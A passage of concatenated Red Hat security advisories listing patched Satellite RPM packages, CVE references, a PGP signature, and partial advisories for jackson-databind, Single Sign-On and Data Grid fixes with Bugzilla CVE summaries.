-1.4.1-3.el7sat.noarch.rpm\ntfm-rubygem-fog-aws-3.6.5-1.el7sat.noarch.rpm\ntfm-rubygem-fog-core-2.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-fog-google-1.8.2-1.el7sat.noarch.rpm\ntfm-rubygem-fog-json-1.2.0-3.el7sat.noarch.rpm\ntfm-rubygem-fog-kubevirt-1.3.3-1.el7sat.noarch.rpm\ntfm-rubygem-fog-libvirt-0.7.0-1.el7sat.noarch.rpm\ntfm-rubygem-fog-openstack-1.0.8-2.el7sat.noarch.rpm\ntfm-rubygem-fog-ovirt-1.2.5-1.el7sat.noarch.rpm\ntfm-rubygem-fog-vsphere-3.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-fog-xml-0.1.2-8.el7sat.noarch.rpm\ntfm-rubygem-foreman-tasks-2.0.2-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible-5.1.3-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_azure_rm-2.1.2-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_discovery-16.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_hooks-0.3.16-2.el7sat.noarch.rpm\ntfm-rubygem-foreman_kubevirt-0.1.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_leapp-0.1.6-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_openscap-4.0.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution-3.3.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution-cockpit-3.3.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_rh_cloud-2.0.12-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_templates-9.0.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_theme_satellite-6.0.1.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_virt_who_configure-0.5.2-1.el7sat.noarch.rpm\ntfm-rubygem-formatador-0.2.1-11.el7sat.noarch.rpm\ntfm-rubygem-friendly_id-5.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-fx-0.5.0-1.el7sat.noarch.rpm\ntfm-rubygem-get_process_mem-0.2.1-3.el7sat.noarch.rpm\ntfm-rubygem-gettext-3.1.4-10.el7sat.noarch.rpm\ntfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat.noarch.rpm\ntfm-rubygem-git-1.5.0-1.el7sat.noarch.rpm\ntfm-rubygem-gitlab-sidekiq-fetcher-0.5.2-2.el7sat.noarch.rpm\ntfm-rubygem-globalid-0.4.2-1.el7sat.noarch.rpm\ntfm-rubygem-google-api-client-0.23.9-3.el7sat.noarch.rpm\ntfm-rubygem-googleauth-0.6.7-3.el7sat.noarch.rpm\ntfm-rubygem-graphql-1.8.14-1.el7sat.noarch.rpm\ntfm-rubygem-graphql-batch-0.3.10-1.el7sat.noarch.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli-2.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman-2.1.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_docker-0.0.6.4-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_openscap-0.1.11-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_remote_execution-0.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_tasks-0.0.14-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.6-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_katello-0.22.2.2-1.el7sat.noarch.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm\ntfm-rubygem-http-3.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm\ntfm-rubygem-http-form_data-2.1.1-1.el7sat.noarch.rpm\ntfm-rubygem-httpclient-2.8.3-1.el7sat.noarch.rpm\ntfm-rubygem-i18n-1.8.2-1.el7sat.noarch.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-ipaddress-0.8.0-11.el7sat.noarch.rpm\ntfm-rubygem-jgrep-1.3.3-12.el7sat.noarch.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm\ntfm-rubygem-katello-3.16.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-kubeclient-4.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-ldap_fluff-0.4.7-5.el7sat.noarch.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-locale-2.0.9-13.el7sat.noarch.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-loofah-2.4.0-1.el7sat.noarch.rpm\ntfm-rubygem-mail-2.7.1-1.el7sat.noarch.rpm\ntfm-rubygem-marcel-0.3.3-1.el7sat.noarch.rpm\ntfm-rubygem-memoist-0.16.0-1.el7sat.noarch.rpm\ntfm-rubygem-method_source-0.9.2-2.el7sat.noarch.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm\ntfm-rubygem-mimemagic-0.3.5-1.el7sat.noarch.rpm\ntfm-rubygem-mini_mime-1.0.2-1.el7sat.noarch.rpm\ntfm-rubygem-mini_portile2-2.4.0-1.el7sat.noarch.rpm\ntfm-rubygem-ms_rest-0.7.4-2.el7sat.noarch.rpm\ntfm-rubygem-ms_rest_azure-0.11.1-2.el7sat.noarch.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm\ntfm-rubygem-net-ldap-0.16.1-1.el7sat.noarch.rpm\ntfm-rubygem-net-ping-2.0.1-3.el7sat.noarch.rpm\ntfm-rubygem-net-scp-1.2.1-3.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-oauth-0.5.4-3.el7sat.noarch.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm\ntfm-rubygem-optimist-3.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-os-1.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat.noarch.rpm\ntfm-rubygem-parse-cron-0.1.4-4.el7sat.noarch.rpm\ntfm-rubygem-polyglot-0.3.5-3.el7sat.noarch.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-prometheus-client-1.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-promise.rb-0.7.4-1.el7sat.noarch.rpm\ntfm-rubygem-public_suffix-3.0.3-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_2to3_migration_client-0.2.0-0.1.b6.el7sat.noarch.rpm\ntfm-rubygem-pulp_ansible_client-0.2.0b13.dev01588546902-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_certguard_client-0.1.0rc5-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_container_client-1.4.1-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_file_client-1.0.1-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_rpm_client-3.5.0-1.el7sat.noarch.rpm\ntfm-rubygem-pulpcore_client-3.4.1-1.el7sat.noarch.rpm\ntfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat.noarch.rpm\ntfm-rubygem-quantile-0.2.0-3.el7sat.noarch.rpm\ntfm-rubygem-rabl-0.14.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-cors-1.0.2-1.el7sat.noarch.rpm\ntfm-rubygem-rack-jsonp-1.3.1-9.el7sat.noarch.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-rack-test-1.1.0-4.el7sat.noarch.rpm\ntfm-rubygem-rails-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.noarch.rpm\ntfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-rails-i18n-6.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-railties-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-rainbow-2.2.1-5.el7sat.noarch.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm\ntfm-rubygem-rbovirt-0.1.7-4.el7sat.noarch.rpm\ntfm-rubygem-rbvmomi-2.2.0-3.el7sat.noarch.rpm\ntfm-rubygem-record_tag_helper-1.0.1-3.el7sat.noarch.rpm\ntfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-redhat_access-2.2.18-1.el7sat.noarch.rpm\ntfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.noarch.rpm\ntfm-rubygem-redis-4.1.2-2.el7sat.noarch.rpm\ntfm-rubygem-representable-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-responders-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm\ntfm-rubygem-retriable-3.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-roadie-3.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-roadie-rails-2.1.1-2.el7sat.noarch.rpm\ntfm-rubygem-robotex-1.0.0-21.el7sat.noarch.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm\ntfm-rubygem-ruby2ruby-2.4.2-3.el7sat.noarch.rpm\ntfm-rubygem-ruby_parser-3.10.1-2.el7sat.noarch.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm\ntfm-rubygem-runcible-2.13.0-2.el7sat.noarch.rpm\ntfm-rubygem-safemode-1.3.5-2.el7sat.noarch.rpm\ntfm-rubygem-scoped_search-4.1.9-1.el7sat.noarch.rpm\ntfm-rubygem-secure_headers-6.3.0-2.el7sat.noarch.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm\ntfm-rubygem-sexp_processor-4.10.0-5.el7sat.noarch.rpm\ntfm-rubygem-sidekiq-5.2.7-3.el7sat.noarch.rpm\ntfm-rubygem-signet-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm\ntfm-rubygem-sprockets-3.7.2-6.el7sat.noarch.rpm\ntfm-rubygem-sprockets-rails-3.2.1-6.el7sat.noarch.rpm\ntfm-rubygem-sshkey-1.9.0-3.el7sat.noarch.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm\ntfm-rubygem-stomp-1.4.9-1.el7sat.noarch.rpm\ntfm-rubygem-text-1.3.0-7.el7sat.noarch.rpm\ntfm-rubygem-thor-1.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-thread_safe-0.3.6-5.el7sat.noarch.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm\ntfm-rubygem-timeliness-0.3.10-1.el7sat.noarch.rpm\ntfm-rubygem-tzinfo-1.2.6-1.el7sat.noarch.rpm\ntfm-rubygem-uber-0.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm\ntfm-rubygem-unicode-display_width-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.noarch.rpm\ntfm-rubygem-webpack-rails-0.9.8-6.el7sat.noarch.rpm\ntfm-rubygem-websocket-extensions-0.1.5-1.el7sat.noarch.rpm\ntfm-rubygem-will_paginate-3.1.7-3.el7sat.noarch.rpm\ntfm-rubygem-x-editable-rails-1.5.5-5.el7sat.noarch.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm\ntfm-rubygem-zeitwerk-2.2.2-1.el7sat.noarch.rpm\n\nx86_64:\ncreaterepo_c-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-libs-0.7.4-1.el7sat.x86_64.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm\nforeman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm\nhfsplus-tools-332.14-12.el7.x86_64.rpm\nhfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibsolv-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibwebsockets-2.4.2-2.el7.x86_64.rpm\nlibwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm\nlivecd-tools-20.4-1.6.el7sat.x86_64.rpm\nmod_passenger-4.0.18-24.el7sat.x86_64.rpm\nmod_xsendfile-0.12-11.el7sat.x86_64.rpm\nmod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm\nostree-2017.1-2.atomic.el7.x86_64.rpm\nostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm\npcp-mmvstatsd-0.4-2.el7sat.x86_64.rpm\npuppet-agent-6.14.0-2.el7sat.x86_64.rpm\npycairo-1.16.3-9.el7sat.x86_64.rpm\npycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm\npygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm\npython-aiohttp-debuginfo-3.6.2-4.el7ar.x86_64.rpm\npython-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm\npython-bson-3.2-2.el7sat.x86_64.rpm\npython-imgcreate-20.4-1.6.el7sat.x86_64.rpm\npython-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm\npython-multidict-debuginfo-4.7.4-2.el7ar.x86_64.rpm\npython-psutil-5.0.1-3.el7sat.x86_64.rpm\npython-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm\npython-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm\npython-pymongo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm\npython-qpid-proton-0.28.0-3.el7.x86_64.rpm\npython-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm\npython-saslwrapper-0.22-5.el7sat.x86_64.rpm\npython-simplejson-3.2.0-1.el7sat.x86_64.rpm\npython-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm\npython-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm\npython-yarl-debuginfo-1.4.2-2.el7ar.x86_64.rpm\npython-zope-interface-4.0.5-4.el7.x86_64.rpm\npython-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm\npython2-billiard-3.5.0.3-3.el7sat.x86_64.rpm\npython2-gobject-3.28.3-2.el7sat.x86_64.rpm\npython2-gobject-base-3.28.3-2.el7sat.x86_64.rpm\npython2-markupsafe-0.23-21.el7sat.x86_64.rpm\npython2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm\npython2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm\npython2-twisted-16.4.1-12.el7sat.x86_64.rpm\npython3-aiohttp-3.6.2-4.el7ar.x86_64.rpm\npython3-multidict-4.7.4-2.el7ar.x86_64.rpm\npython3-yarl-1.4.2-2.el7ar.x86_64.rpm\nqpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-client-devel-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm\nqpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm\nqpid-dispatch-router-1.5.0-4.el7.x86_64.rpm\nqpid-proton-c-0.28.0-3.el7.x86_64.rpm\nqpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm\nqpid-qmf-1.36.0-28.el7amq.x86_64.rpm\nrh-postgresql12-postgresql-evr-0.0.2-1.el7sat.x86_64.rpm\nrubygem-facter-2.4.1-2.el7sat.x86_64.rpm\nrubygem-newt-0.9.6-3.el7sat.x86_64.rpm\nrubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm\nrubygem-passenger-4.0.18-24.el7sat.x86_64.rpm\nrubygem-passenger-debuginfo-4.0.18-24.el7sat.x86_64.rpm\nrubygem-passenger-native-4.0.18-24.el7sat.x86_64.rpm\nrubygem-passenger-native-libs-4.0.18-24.el7sat.x86_64.rpm\nsaslwrapper-0.22-5.el7sat.x86_64.rpm\nsaslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm\ntfm-rubygem-bcrypt-3.1.12-1.el7sat.x86_64.rpm\ntfm-rubygem-bcrypt-debuginfo-3.1.12-1.el7sat.x86_64.rpm\ntfm-rubygem-facter-2.4.0-6.el7sat.x86_64.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-http_parser.rb-0.6.0-1.el7sat.x86_64.rpm\ntfm-rubygem-http_parser.rb-debuginfo-0.6.0-1.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-nio4r-2.5.2-2.el7sat.x86_64.rpm\ntfm-rubygem-nio4r-debuginfo-2.5.2-2.el7sat.x86_64.rpm\ntfm-rubygem-nokogiri-1.10.9-1.el7sat.x86_64.rpm\ntfm-rubygem-nokogiri-debuginfo-1.10.9-1.el7sat.x86_64.rpm\ntfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.x86_64.rpm\ntfm-rubygem-ovirt-engine-sdk-debuginfo-4.2.3-3.el7sat.x86_64.rpm\ntfm-rubygem-passenger-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-passenger-debuginfo-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-passenger-native-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-passenger-native-libs-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-pg-1.1.4-2.el7sat.x86_64.rpm\ntfm-rubygem-pg-debuginfo-1.1.4-2.el7sat.x86_64.rpm\ntfm-rubygem-puma-4.3.3-4.el7sat.x86_64.rpm\ntfm-rubygem-puma-debuginfo-4.3.3-4.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unicode-0.4.4.4-1.el7sat.x86_64.rpm\ntfm-rubygem-unicode-debuginfo-0.4.4.4-1.el7sat.x86_64.rpm\ntfm-rubygem-websocket-driver-0.7.1-1.el7sat.x86_64.rpm\ntfm-rubygem-websocket-driver-debuginfo-0.7.1-1.el7sat.x86_64.rpm\ntfm-runtime-6.1-1.el7sat.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-3258\nhttps://access.redhat.com/security/cve/CVE-2018-11751\nhttps://access.redhat.com/security/cve/CVE-2019-12781\nhttps://access.redhat.com/security/cve/CVE-2019-16782\nhttps://access.redhat.com/security/cve/CVE-2020-5216\nhttps://access.redhat.com/security/cve/CVE-2020-5217\nhttps://access.redhat.com/security/cve/CVE-2020-5267\nhttps://access.redhat.com/security/cve/CVE-2020-7238\nhttps://access.redhat.com/security/cve/CVE-2020-7663\nhttps://access.redhat.com/security/cve/CVE-2020-7942\nhttps://access.redhat.com/security/cve/CVE-2020-7943\nhttps://access.redhat.com/security/cve/CVE-2020-8161\nhttps://access.redhat.com/security/cve/CVE-2020-8184\nhttps://access.redhat.com/security/cve/CVE-2020-8840\nhttps://access.redhat.com/security/cve/CVE-2020-9546\nhttps://access.redhat.com/security/cve/CVE-2020-9547\nhttps://access.redhat.com/security/cve/CVE-2020-9548\nhttps://access.redhat.com/security/cve/CVE-2020-10693\nhttps://access.redhat.com/security/cve/CVE-2020-10968\nhttps://access.redhat.com/security/cve/CVE-2020-10969\nhttps://access.redhat.com/security/cve/CVE-2020-11619\nhttps://access.redhat.com/security/cve/CVE-2020-14061\nhttps://access.redhat.com/security/cve/CVE-2020-14062\nhttps://access.redhat.com/security/cve/CVE-2020-14195\nhttps://access.redhat.com/security/cve/CVE-2020-14334\nhttps://access.redhat.com/security/cve/CVE-2020-14380\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX5gpEdzjgjWX9erEAQgmXRAAjIzb5ngtDgGHNv75R+NwkGD3jzRe/GfK\n1DDrOBxGaminKY9q+hGwwJOGrMbr2gcfu+VtuFgUTaxFjbfml6Lsju9czOPSL+Wa\n5vIcvaUObLQEwmW5hP7ZIqzZvm0UlbSgHEsv7tYwIWkITIg54p2fQzRUuSH8nRhr\noomd60Mv8Ayv6IdogtiNDdv8B7avsNQrbtzf60HGtyZlX8Rro2Wy8gosbfsGl10f\nZ8Nc+tVwWdkdpFjcMtwmYIDtecgwxMmo3FMJRtkSrQ2VldZB9mjFj/WyfZOfV3Io\nOhoAiLFzi52dC68an5/VFnzZWxdOmYjqm4rBZ2MLnw/wn4jH2WOgjK5VBJUW+nmX\nk9pQLGrKlLQeYSVY9Je9Maxz1POajFEV1u+ByAVDBm1xBJMhlTEcTwbHt1X0jLzG\nC2CSzCY8Urz2j1SvYrcrBdNGSqK1wvMwDL7V7lEpaFd/dGE+JwbrOB6z2iYr3de5\n/6nh/jeWFi16C0Z8FbYe021edVuzbzCITbz+UdThAITmROcE7Q6ysDPcvToANfta\nD2gChuqVhmTWJ9YDeQTWiErQLY4OJfklPd/5L/sIZqoZpV8B+5bTHTKsCiisyj1a\nf4PVZiu+CQoxHuj45rTwRLLfP9+SmJpFz+JsId6rKQ2hrzZ4DzB9srzyewd2TfvG\n1yK/tAm1KBU=osSG\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nNOTE: This advisory is an addendum to\nhttps://access.redhat.com/errata/RHBA-2020:1414 and is an informational\nadvisory only, to clarify security fixes released therein. No code has been\nmodified as part of this advisory. Description:\n\nRed Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. Description:\n\nRed Hat Process Automation Manager is an open source business process\nmanagement suite that combines process management and decision service\nmanagement and enables business and IT users to create, manage, validate,\nand deploy process applications and decision services. \n\nIt is recommended to halt the server by stopping the JBoss Application\nServer process before installing this update; after installing the update,\nrestart the server by starting the JBoss Application Server process. 7) - noarch\n\n3. Description:\n\nThe jackson-databind package provides general data-binding functionality\nfor Jackson, which works on top of Jackson core streaming API. \n\nSecurity Fix(es):\n\n* jackson-databind: Serialization gadgets in org.springframework:spring-aop\n(CVE-2020-11619)\n\n* jackson-databind: Serialization gadgets in commons-jelly:commons-jelly\n(CVE-2020-11620)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n\n6. Solution:\n\nTo install this update, do the following:\n\n1. Download the Data Grid 7.3.7 server patch from the customer portal. Back up your existing Data Grid installation. You should back up\ndatabases, configuration files, and so on. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes\nfor patching instructions. Restart Data Grid to ensure the changes take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1595621 - CVE-2017-7658 jetty: Incorrect header handling\n1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class\n1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass\n1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230\n1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain\n1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability\n1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain\n1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1816216 - CVE-2020-11612 netty: compression/decompression codecs don\u0027t enforce limits on buffer allocation sizes\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory\n1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in 